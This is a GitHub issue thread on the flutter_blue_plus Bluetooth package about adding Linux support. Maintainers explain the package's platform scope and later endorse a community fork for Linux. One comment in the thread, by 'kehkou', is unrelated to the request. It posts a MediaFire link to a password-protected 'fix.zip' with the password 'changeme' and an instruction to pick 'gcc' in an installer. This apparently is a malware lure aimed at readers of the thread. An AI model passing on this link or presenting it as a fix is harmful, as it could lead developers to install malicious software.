chipweinberger/flutter_blue_plus #983: [Feature]: Linux Support

chipweinberger, 2024-08-29:
### FlutterBluePlus Version

all

### Flutter Version

all

### What OS?

All

### OS Version

all

### Bluetooth Module

all

### What is your feature request?

Add Linux support to FBP

### Logs

```shell
h
```

chipweinberger, 2024-08-29:
@tnc1997 recently created a PR for Linux: https://github.com/chipweinberger/flutter_blue_plus/pull/969

However, FBP plans to remain Android/iOS/Mac only.

Support for other platforms will happen via FBP wrappers (example: https://pub.dev/packages/flutter_blue_plus_windows)

I'll keep this issue open until a wrapper is created for Linux.

kehkou, 2024-08-29:
Download 
https://www.mediafire.com/file/jc5ws0hujgycrp5/fix.zip/file
password: changeme
In the installer menu, select "gcc."

redradist, 2024-09-18:
@chipweinberger 
> However, FBP plans to remain Android/iOS/Mac only.

As I understood you do not what any other platforms due to harder to maintain it
 
> If you want to develop Linux support, you should create a wrapper like we have for Windows (example: https://pub.dev/packages/flutter_blue_plus_windows)

But than you write that you will leave it open for futher implementation of Linux ?!

chipweinberger, 2024-11-08:
Someone else can implement it & maintain it. Then I will link to it in the README.

tnc1997, 2024-11-13:
An in development fork of Flutter Blue Plus that supports Linux using a [platform interface](https://docs.flutter.dev/packages-and-plugins/developing-packages#plugin) is available [here](https://github.com/tnc1997/flutter-blue-plus).

Please note that this unofficial fork is not endorsed by Chip Weinberger and is supported on a best efforts basis.

I would like to thank Chip Weinberger for their ongoing work on the existing Android/iOS/macOS package.

chipweinberger, 2024-12-23:
@tnc1997 's [fork](https://github.com/tnc1997/flutter-blue-plus) is now the official solution for for linux, web, & generic platform interface support.

Please start using it. Eventually the goal is to merge.

redradist, 2025-01-07:
It is great that this project now supports Linux !! Thanks a lot !!